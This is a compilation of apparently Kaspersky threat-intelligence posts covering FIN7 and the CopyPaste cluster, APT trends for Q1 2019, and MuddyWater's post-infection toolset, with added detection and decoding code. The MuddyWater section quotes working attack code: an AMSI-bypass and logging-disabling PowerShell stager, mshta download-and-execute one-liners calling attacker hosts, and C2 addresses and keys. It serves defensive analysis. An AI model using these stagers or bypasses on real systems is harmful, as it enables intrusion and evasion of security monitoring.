At the end of 2018, while searching for new FIN7 campaigns via telemetry, we discovered a set of activity that we temporarily called “CopyPaste”, from a previously unknown APT. Interestingly, this actor targeted financial entities and companies in one African country, which led us to think that CopyPaste was associated with cybermercenaries or a training center.

This set of activity relied on open-source tools, such as Powershell Empire, and well-documented red teaming techniques, in order to get a foothold within the victim’s networks and avoid detection.

Here are the main similarities between CopyPaste and FIN7:

  • Both used the same Microsoft PowerShell argument obfuscation order: “powershell.exe -NoP -NonI -ExecutionPolicy Bypass”. We have only seen FIN7 and CopyPaste use this argument list for executing their malicious PowerShell scripts.
  • Both used decoy 302 HTTP redirections and typosquatting on their C2s (reminiscent of Cobalt and FIN7). The Empire C2s associated with CopyPaste had decoy redirections to Digicert and Microsoft websites, and used decoy employment and tax websites with decoy redirections to host their payloads. FIN7 and Cobalt used decoy 302 HTTP redirections too: FIN7 on its GRIFFON C2s before January 2018, and Cobalt on its staging servers, similar to CopyPaste.
  • Quite recently, FIN7 threat actors typosquatted the brand “Digicert” using the domain name digicert-cdn[.]com, which is used as a command and control server for their GRIFFON implants. CopyPaste, in turn, also typosquatted this brand with the domains digicertweb[.]com and digi-cert[.]org, both used as Powershell Empire C2s with decoy HTTP 302 redirects to the legitimate Digicert website.

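As an added example for both the FIN7/EmpireMonkey overlaps and the CopyPaste similarities above (code written for this page, not Kaspersky's detection content), the following evaluates Sysmon-style process-creation events against the three host artifacts the post names: wscript.exe copied under an "ms..." name, an Errors.txt/Errors.bat script run from %TEMP%, and the fixed "-NoP -NonI -ExecutionPolicy Bypass" argument order. The field names (Image, OriginalFileName, CommandLine) are assumed to follow Sysmon event ID 1; every event below is constructed.

```python
"""Process-creation triage for the host artifacts listed in the post.

Added example, not Kaspersky code. Events are dicts with Sysmon-style fields
(Image, OriginalFileName, CommandLine); all sample events are constructed.
"""
import ntpath
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# A script named "Errors" with the extensions seen for FIN7 (.txt) and
# EmpireMonkey (.bat), anywhere under a Temp directory.
ERRORS_IN_TEMP = re.compile(r"\\Temp\\Errors\.(?:txt|bat)\b", re.IGNORECASE)

# The exact switch order the post singles out. PowerShell treats switches
# case-insensitively, so case is ignored but the order stays fixed.
COPYPASTE_ARGS = re.compile(
    r"powershell(?:\.exe)?\s+-NoP\s+-NonI\s+-ExecutionPolicy\s+Bypass\b", re.IGNORECASE
)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def evaluate(event: Event) -> List[str]:
    """Return the names of the rules an event triggers (empty list if none)."""
    hits: List[str] = []
    image = ntpath.basename(event.get("Image", "")).lower()
    # OriginalFileName comes from the PE version resource, so it survives a copy/rename.
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")

    if original == "wscript.exe" and image != "wscript.exe":
        hits.append("renamed-wscript-ms-prefix" if image.startswith("ms") else "renamed-wscript")
    if original in SCRIPT_HOSTS and ERRORS_IN_TEMP.search(cmd):
        hits.append("errors-script-in-temp")
    if COPYPASTE_ARGS.search(cmd):
        hits.append("copypaste-powershell-args")
    return hits


def scan(events: List[Event]) -> List[Tuple[int, List[str]]]:
    """Run every event through evaluate() and keep those with at least one hit."""
    flagged: List[Tuple[int, List[str]]] = []
    for index, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            flagged.append((index, hits))
    return flagged


# Constructed events, not real telemetry.
SAMPLE_EVENTS: List[Event] = [
    {  # FIN7-style: wscript.exe copied to mses.exe, running Errors.txt from %TEMP%
        "Image": r"C:\Users\Public\mses.exe",
        "OriginalFileName": "wscript.exe",
        "CommandLine": r'"C:\Users\Public\mses.exe" //E:jscript C:\Users\alice\AppData\Local\Temp\Errors.txt',
    },
    {  # CopyPaste-style PowerShell launch with the fixed switch order
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": 'powershell.exe -NoP -NonI -ExecutionPolicy Bypass -Command "<payload placeholder>"',
    },
    {  # Benign: the real wscript.exe running a logon script
        "Image": r"C:\Windows\System32\wscript.exe",
        "OriginalFileName": "wscript.exe",
        "CommandLine": r"wscript.exe C:\Scripts\logon.vbs",
    },
    {  # Benign: same switches in a different order, which the post does not tie to either actor
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -NoP -NonI -File C:\ops\backup.ps1",
    },
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, hits)
```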
The links between CopyPaste and FIN7 are still very weak. It is possible that the CopyPaste operators were influenced by open-source publications and do not have any ties with FIN7.

Conclusions

During 2018, Europol and the DoJ announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. It was believed that the arrest of the group leader would have an impact on the group’s operations. However, recent data seems to indicate that the attacks have continued without significant setbacks. One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella. We observe, with various levels of confidence, that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.

The first of them is the well-known FIN7, which specializes in attacking various companies to get access to financial data or PoS infrastructure. They rely on a Griffon JS backdoor and Cobalt/Meterpreter, and in recent attacks, Powershell Empire. The second one is CobaltGoblin/Carbanak/EmpireMonkey, which uses the same toolkit, techniques and similar infrastructure but targets only financial institutions and associated software/services providers.

We link the AveMaria botnet to these two groups with medium confidence: AveMaria’s targets are mostly suppliers for big companies, and the way AveMaria manages its infrastructure is very similar to FIN7. The last piece is the newly discovered CopyPaste group, which targeted financial entities and companies in one African country, which led us to think that CopyPaste was associated with cybermercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7.

All of the aforementioned groups greatly benefit from unpatched systems in corporate environments. They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework. So far, the groups have not used any zero-days.

FIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they are quite successful. As with their previous fake company “Combi Security”, we are confident that they continue to create new personas for use in either targeting or recruiting under a “new” brand, “IPC”.

More information about these and related attacks is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

Indicators of compromise

In order to preserve the privacy of the potential victims, we stripped the targeted entities from the domain names.

APT trends report Q1 2019

30 April, 2019 - 12:00

For just under two years, the Global Research and Analysis Team (GReAT) at Kaspersky Lab has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They aim to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q1 2019.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact ‘intelreports@kaspersky.com’.

The most remarkable finding

Targeting supply-chains has proved very successful for attackers in recent years – ShadowPad, CCleaner and ExPetr are good examples. In our threat predictions for 2019, we flagged this as a likely continuing attack vector; and we didn’t have to wait very long to see this prediction come true. In January, we discovered a sophisticated supply-chain attack involving the ASUS Live Update Utility, the mechanism used to deliver BIOS, UEFI and software updates to ASUS laptops and desktops. The attackers behind “Operation ShadowHammer” added a backdoor to the utility and then distributed it to users through official channels. The goal of the attack was to target with precision an unknown pool of users, identified by their network adapter MAC addresses. The attackers were found to have hardcoded a list of MAC addresses into the Trojanized samples, representing the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it’s possible that other samples exist that target different MAC addresses.

Russian-speaking activity

Russian-speaking groups were not especially active during the first part of the year, with no noteworthy technical or operational changes. However, they continued their non-stop activity in terms of spreading, with a special interest in political activity.

This was apparent in an attack focused on the Ukraine elections. The attack surfaced after we discovered a malicious Word document targeting a German political advisory organization. This organization, according to its website, “advises political decision-makers on international politics and foreign and security policy”. Our technical analysis of the attack suggests that the Sofacy or Hades groups are behind it, though we’re unable to say for sure which of these groups is responsible.

Such political interests are not new. Recently, a court in Virginia gave Microsoft control of a group of websites that were intended to look like login sites for a Washington think tank, but are believed to be part of the infrastructure of a “Russian group suspected in the DNC hack”.

Additionally, Microsoft revealed that a “Russian nation-state hacking group” targeted political organizations engaged in the 2019 European Parliament elections scheduled for the end of May.

On the technical side, since mid-January we have been tracking an active Turla campaign targeting government bodies in Turkmenistan and Tajikistan. This time the actor delivered its known KopiLuwak JavaScript using new .NET malware, called “Topinambour” (aka Sunchoke) by its developers. The Topinambour dropper is delivered along with legitimate software and consists of a tiny .NET shell that waits for Windows shell commands from operators. Interestingly, in this campaign the attackers used different artefacts implemented in JavaScript, .NET and PowerShell – all of them with similar functionality.

We also published details on how Zebrocy has added the “Go” language to its arsenal – the first time that we have observed a well-known APT threat actor deploy malware with this compiled, open source language. Zebrocy continues to target government-related organizations in Central Asia, both in-country and in remote locations, as well as a new diplomatic target in the Middle East.

Finally, during February 2019 we observed a highly targeted attack in Crimea using a previously unknown malware. The spy program was spread by email and masqueraded as the VPN-client of a well-known Russian security company that, among other things, provides solutions to protect networks. At this point we can’t relate this activity to any known actor.

Chinese-speaking activity

Recent APT trend summaries included analyses of new Chinese-speaking threat actors as well as the resurgence of old activity sets. This has continued into 2019.

In the early months of 2019, Chinese-speaking actors were the most active, with a traditional interest in targeting different countries in South East Asia. A recent indictment of two Chinese nationals by the US Department of Justice on charges of computer hacking, conspiracy to commit wire fraud and aggravated identity theft, alleged that they were members of the APT10 group, carrying out illegal activity on behalf of the Chinese Ministry of State Security.

Similarly, CactusPete (aka LoneRanger, Karma Panda, and Tonto Team) is reported to have targeted South Korean, Japanese, US, and Taiwanese organizations in the 2012 – 2014 timeframe. The actor has quite likely relied on much the same codebase and implant variants for the past six years. However, these have broadened substantially since 2018. The group spear-phishes its targets, deploys Word and Equation Editor exploits and an appropriated/repackaged DarkHotel VBScript zero-day, delivers modified and compiled unique Mimikatz variants, GSEC and WCE credential stealers, a keylogger, various Escalation of Privilege exploits, various older utilities and an updated set of backdoors, and what appear to be new variants of custom downloader and backdoor modules.

We have been monitoring a campaign targeting Vietnamese government and diplomatic entities abroad since at least April 2018. We attribute the campaign, which we call “SpoiledLegacy”, to the LuckyMouse APT group (aka EmissaryPanda and APT27). The operators use penetration testing frameworks such as Cobalt Strike and Metasploit. While we believe that they exploit network services vulnerabilities as their main initial infection vector, we have also seen spear-phishing messages containing decoy documents. We believe that, as in a previous LuckyMouse campaign, internal database servers are among the targets. For the last stage of their attack they use different in-memory 32- and 64-bit Trojans injected into system process memory. It is worth highlighting that all the tools in the infection chain dynamically obfuscate Win32 API calls using leaked HackingTeam code.

FireEye defined APT40 as the Chinese state-sponsored threat actor previously reported as TEMP.Periscope, Leviathan and TEMP.Jumper. According to FireEye, the group has conducted operations in support of China’s naval modernisation effort since at least 2013, specifically targeting engineering, transportation and defence industries, especially where these sectors overlap with maritime technologies. Recently, FireEye also observed specific targeting of countries strategically important to the “Belt and Road” Initiative, including Cambodia, Belgium, Germany, Hong Kong, the Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States and the United Kingdom.

Interestingly, the use of newer ANEL versions by APT10, targeting Japan, allowed us to find similarities between this malware and Emdivi, malware previously used by BlueTermite. This suggests a potential connection between both actors.

South East Asia and Korean peninsula

Once again, this seems to be the most active region of the world in terms of APT activity.

In January, we identified new activity by the Transparent Tribe APT group (aka PROJECTM and MYTHIC LEOPARD), a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets.

In February, we identified a campaign targeting military organizations, this time in India. We are currently unable to attribute this campaign to any known threat actor. The attackers rely on watering-holes and spear-phishing to infect their victims. Specifically, they were able to compromise a website belonging to a think tank related to warfare studies, using it to host a malicious document that distributed a variant of the Netwire RAT. We also found evidence of a compromised welfare club for military personnel distributing the same malware during the same time period.

OceanLotus was another actor active during this period, using a new downloader called KerrDown, as reported by Palo Alto. The actor was discovered at the beginning of the year using freshly-compiled samples in a new wave of attacks. ESET recently uncovered a new addition to this actor’s toolset targeting Mac OS.

In mid-2018, our report on “Operation AppleJeus” highlighted the focus of the Lazarus threat actor on cryptocurrency exchanges. In this operation, the group used a fake company with a backdoored product aimed at cryptocurrency businesses. One of the key findings was the group’s new ability to target Mac OS. Since then, Lazarus has expanded its operations for this platform. Further tracking of the group’s activities has enabled us to discover a new operation, active since at least November 2018, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers. Lazarus isn’t the only APT group targeting cryptocurrency exchanges. The Kimsuky group has also extended its activities to include individuals and companies in this sector, mainly in South Korea.

Finally, at the start of the year, the South Asian Bitter group used a new simple downloader (called ArtraDownloader by Palo Alto) that delivers the BitterRat Trojan to target organizations in Saudi Arabia and Pakistan.

Middle East

Surprisingly, during the first months of the year activity in the Middle East has, apparently, been less intense than in the past. Even so, it was the target of several groups already discussed, such as Chafer and Bitter.

We also observed some activity from Gaza Team and MuddyWater. Still, this can be considered part of their continued targeting of the region, showing nothing new in terms of operational or technical improvements.

Other interesting discoveries

Late in 2018 we observed a new version of the FinSpy iOS implant in the wild. This is part of FinSpy Mobile, a product provided by the surveillance solutions developer, Gamma Group. FinSpy for iOS implements extensive spyware features that allow someone to track almost everything on infected devices, including keypresses, messages and calls. A big limitation is that the current version can only be installed on jailbroken devices. We believe that Gamma Group does not provide an exploit tool to jailbreak victims’ phones, but it provides advice and support to customers on how to do the jailbreaking themselves. Our telemetry shows implant traces in Indonesia and Mongolia. However, due to the large number of Gamma customers, this is probably only a fraction of the victims.

Following this research, we discovered a new version for Android also dated circa June 2018. While it is quite similar in terms of functionality, it implements unique capabilities specific to the platform such as obtaining root privileges by abusing the DirtyCow exploit (CVE-2016-5195). Just like the iOS version, this implant has features to exfiltrate data from Instant Messengers including Threema, Signal, Whatsapp and Telegram, as well as internal device information including, but not limited to, emails and SMS messages.

In February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows – the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have recently discovered using our technologies. Further analysis led us to uncover a zero-day vulnerability in “win32k.sys”. We reported this to Microsoft on 22 February. The company confirmed the vulnerability and assigned it CVE-2019-0797. Microsoft released a patch on 12 March 2019, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin with the discovery. We believe that this exploit is being used by several threat actors – including, but possibly not limited to, FruityArmor and SandCat. FruityArmor is known to have used zero-days before, while SandCat is a new APT actor that we discovered only recently. The exploit found in the wild was targeting 64-bit operating systems in the Windows 8 to Windows 10 build 15063 range.

FruityArmor and SandCat, interestingly, seem to follow parallel paths, both having the same exploits available at the same time. This seems to point to a third party providing both with such artefacts.

Ransomware has become an interesting tool for APT actors, as it can be used to delete traces, conduct cyber-sabotage, or act as a powerful distraction. There is an interesting wave of ransomware attacks that we have been following, as they seem to be mainly interested in big targets. LockerGoga recently compromised the systems of Altran, Norsk Hydro and other companies. It’s unclear who’s behind the attacks, what they want and the mechanism used to first infect its victims. It’s not even clear if LockerGoga is ransomware or a wiper. The malware encrypts data and displays a ransom note asking victims to get in touch to arrange decryption, in return for an (unspecified) payment in bitcoins. However, later versions were observed by researchers that forcibly log victims off infected systems by changing their passwords and removing their ability to log back into the system. In such cases, the victims may not even get to see the ransom note.

Final thoughts

Looking back at what has happened during the first months of the year is always a surprising experience for us. Even when we have the feeling that “nothing groundbreaking” has occurred, we always uncover a threat landscape that is full of many interesting stories and evolution on different fronts.

If we are to provide a few general highlights, we can conclude that:

  • Geopolitics keeps gaining weight as the main driver of APT activity
  • South East Asia is still the most active region of the world in terms of APT activity, but probably this is also related to the “noise” that some of the less experienced groups make
  • Russian-speaking groups keep a low profile in comparison with recent years: maybe this is part of internal restructuring, but this is just a hypothesis
  • Chinese-speaking actors maintain a high level of activity, combining low and high sophistication depending on the campaign
  • Providers of “commercial” malware available for governments and other entities seem to be doing well, with more customers

If we are to highlight one thing from the whole period, in our opinion operation ShadowHammer combines several factors that define the current status of APT activity. This is an advanced and targeted campaign using the supply-chain for distribution on an incredibly wide scale. It involves several steps in a combined operation, including the initial collection of MAC addresses for their targets. This seems to be a new trend, as the actor also targeted other victims for malware distribution, showing how worrisome and difficult it is to fight supply-chain attacks.

As always, this is only our visibility. We always have to keep in mind other sophisticated attacks that happen under our radar, but we continue to try and improve, to uncover every single one of them.

I know what you did last summer, MuddyWater blending in the crowd

29 April, 2019 - 10:00

Introduction

MuddyWater is an APT with a focus on governmental and telco targets in the Middle East (Iraq, Saudi Arabia, Bahrain, Jordan, Turkey and Lebanon) and also a few other countries in nearby regions (Azerbaijan, Pakistan and Afghanistan).

MuddyWater first surfaced in 2017 and has been active continuously, targeting a large number of organizations. First stage infections and graphical decoys have been described by multiple sources, including in our previous research: “MuddyWater expands operations”.

Nevertheless, comprehensive details of what happens after the initial infection by MuddyWater have not previously been made publicly available. MuddyWater attackers deploy a variety of tools and techniques, mostly developed by the group itself in Python, C# and PowerShell, to implement their attacks and complete their victim infiltration and data exfiltration. Examples of such tools include multiple download/execute tools and RATs in C# and Python, SSH Python script, multiple Python tools for extraction of credentials, history and more.

This report details a collection of tools used by this threat actor on its targets after initial infection. It also details deceptive techniques used to divert investigations once attack tools have been deployed inside victim systems (such as Chinese strings, Russian strings and impersonation of the “RXR Saudi Arabia” hacking group). The investigation revealed additional OPSEC mistakes by the attackers, but we are not detailing those here due to ongoing law enforcement investigations.

Attackers’ toolset analysis

During our research on MuddyWater campaigns, we were able to identify a number of tools and scripts used by this actor, providing a good understanding of this actor’s abilities. Most of the tools used are custom developed, while others are based on more generic and publicly available ones.

The list includes:

  • Nihay – C# Download-and-Execute tool
  • LisfonService – C# RAT
  • Client.py – Python RAT
  • Client-win.py – SSH Python script
  • Rc.py/Rc.exe – Basic Python RAT
  • VBScript and VBA files
  • Third-party scripts (Muddy, Losi Boomber, Slaver reverse tunnel…)
  • Second stage PowerShell scripts

Most of these tools are scripts written in Python or PowerShell. We noticed that MuddyWater compiles various offensive Python scripts into executables for portability, using Py2Exe and PyInstaller for this task. This includes Python scripts such as “CrackMapExec”, “shootback” and “Lazagne”.

We have also noticed the use of “PS2EXE” to convert PowerShell scripts into executables, with the original PowerShell code embedded as a Base64-encoded string. In other cases, we have noticed a preference for using PowerShell Reflective DLL injection to deploy Metasploit Stageless Meterpreters. They use both 32-Bit and 64-Bit versions. Usually, the Stageless Meterpreter has the “Ext_server_stdapi.x64.dll”, “Ext_server_extapi.x64.dll”, and “Ext_server_espia.x64.dll” extensions.

Nihay – C# Download-and-Execute tool

The tool called “Nihay” (as per its Pdb) is a basic “Download-and-Execute” Trojan written in C#. It downloads a PowerShell one-liner from a hardcoded URL (for instance, https://beepaste[.]io/view/raw/pPCMo1) and passes it to “cmd.exe /c”.

LisfonService – C# RAT

LisfonService is a RAT very similar to the PowerShell RAT that we have analyzed in our previous publication. LisfonService randomly chooses a URL from a huge array of hardcoded Proxy URLs hiding the real C2 server. It collects some basic information about its victim: user name, domain or workgroup name, machine name, machine internal IP address, OS version, OS build and public IP address. Once the victim is successfully registered, a victim id is assigned to the victim and is used later to request commands from the C2, such as executing PowerShell code or causing a Blue Screen.

Inside the decompiled C# code, there is a referenced variable named “str1” that is not actually used. We believe that it is a remnant from an earlier testing phase and it might be the IP address of the C2 behind the Proxy URLs.

str1 = "http://78.129.222.56:8090/244271232658346635408608084822345041494";

When reaching this URL it returns a funny chat that attackers may have left for researchers:

Client.py – Python RAT

Client.Py is a Python 3.6 RAT that we believe was developed by MuddyWater. It is deployed on victim computers as a compiled Python executable using PyInstaller. The execution flow is as follows:

  1. Collects basic information about the victim machine: machine name, OS name, OS version, and user name. It then sends the information to the C2 server at 192.64.86[.]174:8980.
  2. It supports multiple commands, some of them executed by creating a temporary .VBS file and running it by calling cscript.exe. The supported commands allow the RAT to implement basic keylogger functionality, steal passwords saved in Chrome, kill Task Manager, execute commands remotely and display an alert message to the victim in a message box.

Client-win.py – SSH Python script

This PyInstaller-compiled Python script makes use of the Python paramiko plugin to create a SSH connection to its C2.

  1. Connects to a hard-coded IP address for the C2 (for instance 104.237.233[.]38) on port 8085, sending the string “ip”. It should then receive a list of IPs in the form of “ip1::ip2::ip3”.
  2. The script then connects to the same hard-coded IP address, sending the string “pw” so that it gets a list of passwords from the C2 in the form of “pw1\npw2\npw3”.
  3. Finally, it tries a list of hard-coded user names (such as ‘cisco’, ‘root’, ‘admin’) with each of the passwords received on each of the IPs obtained in step 1 to authenticate SSH sessions.

Rc.py/Rc.exe – Basic Python RAT

This UPX-packed executable is a PyInstaller-compiled Python script (rc.py). The script receives the IP address of its C2 as parameters, connecting to it on the hard-coded port 9095.

This basic RAT supports a few commands on victims’ systems to collect passwords and remote command execution.

  • “kill” to self-terminate.
  • “cd” for changing current directory.
  • “dopass” for grabbing credentials from Chrome, IE, Mozilla, Opera and Outlook.
  • “info” extracts basic info about victim machine: OS name/version, 32-bit/64-bit, processor name, user name, machine name, machine FQDN, internal IP address, MAC address, and public IP address.
  • “shell” receives files from the C2 and saves them in “C:\ProgramData”.
  • “exec” spawns a new process as determined by the C2.
  • Otherwise, cmd.exe /c is called to spawn a new process as determined by the C2. Output is always sent to the C2.

VBScript and VBA files

One of MuddyWater’s preferred infection vectors is the use of weaponized macro-enabled Office 97-2003 Word documents. Its malicious VBA code includes a Base64-encoded payload.

The first file is a malicious VBScript and the second file is the Base64-encoded payload. The VBS calls powershell.exe to Base64-decode the second file and invoke it, as follows:

WScript.CreateObject("WScript.Shell").Run "mshta vbscript:Close(Execute(""CreateObject(""""WScript.Shell"""").Run""""powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));"""",0 ""))",0

This same technique has been seen implemented in several VBScripts seen in the wild, also suspected of being used by this actor.

Third-party scripts

We detected MuddyWater including several “Lazagne“-based scripts in its arsenal. The first one, called Losi Boomber, is used to extract credentials and history from browsers and Outlook.

Losi Boomber command line arguments

Muddy is another Lazagne-based script extracting credentials from mail clients and browsers.

Muddy command line arguments

In this case, it supports the following browsers: Chrome, IE, Mozilla, Opera and Coccoc. In terms of mail clients, it only supports Outlook.

Some embedded imported Python modules

Slaver.py is a compiled Python script taken from “ShootBack”, used for establishing a reverse tcp tunnel.

Slaver command line arguments

Cr.exe is a compiled Python script based on CrackMapExec, used for credential gathering and lateral code execution. Mmap.py (called “MapTools” by MuddyWaters) is also based on CrackMapExec and used for the same purpose.

Embedded Imported Python Modules

Second stage PowerShell scripts

We detected MuddyWater making extensive use of PowerShell scripts for different purposes:

Case1: To fetch next stage, which is also a PowerShell script:

If($PSVerSIonTAblE.PSVeRSIon.MAJoR -Ge 3){ $GPS=[ReF].AsSemBLy.GEtTYpE('System.Management.Automation.Utils')."GetFiE`lD"('cachedGroupPolicySettings','N'+'onPublic,Static').GeTVAluE($NulL); If($GPS['ScriptB'+'lockLogging']){ $GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0; $GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0 }ELsE{ [SCriPTBlOCk]."GetFIe`Ld"('signatures','N'+'onPublic,Static').SETVAlue($NUlL,(NeW-OBJECt ColLECTIOnS.GENERIC.HaShSEt[STrInG])) } [REf].ASsembly.GetTYPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFielD('amsiInitFailed','NonPublic,Static').SeTVALUE($NUll,$tRuE)};}; [SyStEM.NEt.SerVICEPoINtMaNAGeR]::EXPEct100CONTiNuE=0;$K=[SySteM.TExt.EncoDINg]::ASCII.GetBYtES('mdxg_U(,Q3[;~a20DFhrvO+H-NAnKz!V'); $R={$D,$K=$ArGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]}; $D|%{$I=($I+1)%256; $H=($H+$S[$I])%256; $S[$I],$S[$H]=$S[$H],$S[$I]; $_-BXOR$S[($S[$I]+$S[$H])%256]}}; $ie=New-Object -COM InternetExplorer.Application; $ie.Silent=$True; $ie.visible=$False; $fl=14; $ser='http://104.237.233.40:7070'; $t='/admin/get.php'; $ie.navigate2($ser+$t,$fl,0,$Null,'CF-RAY: oBLKRK3GNKZcBGZeWl+s4ExIaQ0='); while($ie.busy){ Start-Sleep -Milliseconds 100}; $ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml; try {$data=[System.Convert]::FromBase64String($ht)} catch {$Null} $iv=$DATA[0..3]; $data=$dATa[4..$DATa.LENGTh]; -joiN[ChaR[]](& $R $DATa ($IV+$K))|IEX

Besides disabling PowerShell Script Block Logging and bypassing AMSI (Anti-Malware Scan Interface), it fetches its next stage using the “InternetExplorer.Application” COM object to retrieve HTML content from http://104.237.233[.]40:7070/admin/get.php. Interestingly, it uses a hard-coded CloudFlare HTTP header value: “CF-RAY: oBLKRK3GNKZcBGZeWl+s4ExIaQ0=”. The retrieved body is Base64-decoded, the first four bytes are taken as an IV, and the remainder is RC4-decrypted with the IV prepended to the hard-coded key before being passed to IEX.
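The following is an added example, not code from the report or from the actor: an offline decoder for the second-stage response format used by the stager above. It re-implements the RC4 routine from the $R scriptblock in Python so a captured response body can be decoded for analysis; the fixture builder exists only to construct test input, and the placeholder script text is constructed.

```python
"""Offline decoder for the MuddyWater second-stage response format.

Added example, not code from the report or from the actor. The stager
base64-decodes the HTML body, uses bytes 0..3 as an IV, and RC4-decrypts
the remainder with key = IV + hard-coded key string, then IEX's the text.
"""
import base64
import os
from typing import Optional

# Key string exactly as hard-coded in the stager quoted on this page.
STAGER_KEY = b"mdxg_U(,Q3[;~a20DFhrvO+H-NAnKz!V"


def rc4(data: bytes, key: bytes) -> bytes:
    """RC4 key scheduling and keystream generation as written in $R.

    KSA mirrors the $J loop, PRGA mirrors the $I/$H loop, and each byte is
    XORed with S[(S[I] + S[H]) % 256] (the -BXOR in the scriptblock).
    """
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = h = 0
    for byte in data:
        i = (i + 1) % 256
        h = (h + s[i]) % 256
        s[i], s[h] = s[h], s[i]
        out.append(byte ^ s[(s[i] + s[h]) % 256])
    return bytes(out)


def decode_stage(body_b64: str, key: bytes = STAGER_KEY) -> str:
    """Decode a base64 response body into the next-stage PowerShell text."""
    raw = base64.b64decode(body_b64)
    if len(raw) <= 4:
        raise ValueError("response too short: need a 4-byte IV plus payload")
    iv, ciphertext = raw[:4], raw[4:]
    plain = rc4(ciphertext, iv + key)
    # -join[char[]] turns each byte into one character, i.e. Latin-1 semantics.
    return plain.decode("latin-1")


def build_sample_response(script: str, key: bytes = STAGER_KEY,
                          iv: Optional[bytes] = None) -> str:
    """Inverse transform, used here only to construct an offline test fixture
    (RC4 is symmetric, so the same routine encrypts). The script text passed
    in is a constructed, harmless placeholder, not a real second stage."""
    iv = os.urandom(4) if iv is None else iv
    if len(iv) != 4:
        raise ValueError("IV must be exactly 4 bytes")
    blob = iv + rc4(script.encode("latin-1"), iv + key)
    return base64.b64encode(blob).decode("ascii")


if __name__ == "__main__":
    fixture = build_sample_response("Write-Host 'constructed sample stage'")
    print(decode_stage(fixture))
```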

Case 2: We also identified MuddyWater’s PowerShell prototype RAT implementing functions to collect user info (internal IP address, user name, domain name, 32bit/64bit), RC4 encryption/decryption, Base64 encoding and decoding, changing cached group policy settings (cachedGroupPolicySettings) for PowerShell security settings, EnableScriptBlockLogging, EnableScriptBlockInvocationLogging. It also disables all HTTPS SSL certificate checks.

We have seen cases where the above was renamed to “km” and directly invoked with its C2 IP set to “78.129.139[.]134”, port “8080” and RC4 key set to “KharashoNIKharasho!@#123456_6”:

km -ip 78.129.139.134 -port 8080 -Key KharashoNIKharasho!@#123456_6 -Delay 20

Case 3: We found an interesting case (apparently exclusive to this actor) of a WinRAR SFX (self-extracting archive) named “Iranicard.exe”. The embedded SFX pre-setup script is an MSHTA one-liner, which invokes a PowerShell one-liner that downloads and executes PowerShell code from ‘https://dzoz[.]us/js/js.js’.

Presetup=mshta vbscript:Close(Execute("CreateObject(""WScript.Shell"").run ""powershell.exe -nop -w hidden -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $V.downloadstring('https://dzoz.us/js/js.js');"",0"))

Attribution, distraction and OPSEC

In our analysis of this actor’s activities we have detected multiple OPSEC mistakes and analyzed some of the distraction techniques it has used. Among the OPSEC mistakes, there were multiple PDB file paths left in some samples or in artifacts collected from the C2 server.

Dragon and Panda strings

The .Net RAT called “LisfonService” has PDB file paths referring to “dragon” and “Panda” as user names.

C:\Users\dragon\Documents\Visual Studio 2015\Projects\64\Telegram\LisfonService\obj\Release\LisfonService.pdb

Dragon in LisfonService PDB File Path

C:\Users\Panda\Documents\Visual Studio 2010\Projects\TestService\TestService\obj\x86\Release\TestService.pdb

Panda in TestService (LisfonService Earlier Version) PDB File Path

Panda and dragon could have been deliberately used to point researchers to a possible Chinese actor, or it may just be the way attackers like to refer to themselves. It is worth mentioning that in some of the PowerShell RATs, attackers also used the “$dragon_middle” variable name for an array of C2 proxy URLs.

$dragon_middle from the Powershell samples

User names inside weaponized word documents

Multiple weaponized Office Word documents also contain embedded paths from their authors’ machines. These paths are embedded by Office under various circumstances: for instance, when somebody adds a binary object (like an OLE control such as a text box or a command button) into a Word document. These PDBs provide the following usernames: poopak, leo, Turk and Vendetta:

C:\Users\poopak\AppData\Local\Temp\Word8.0\MSForms.exd
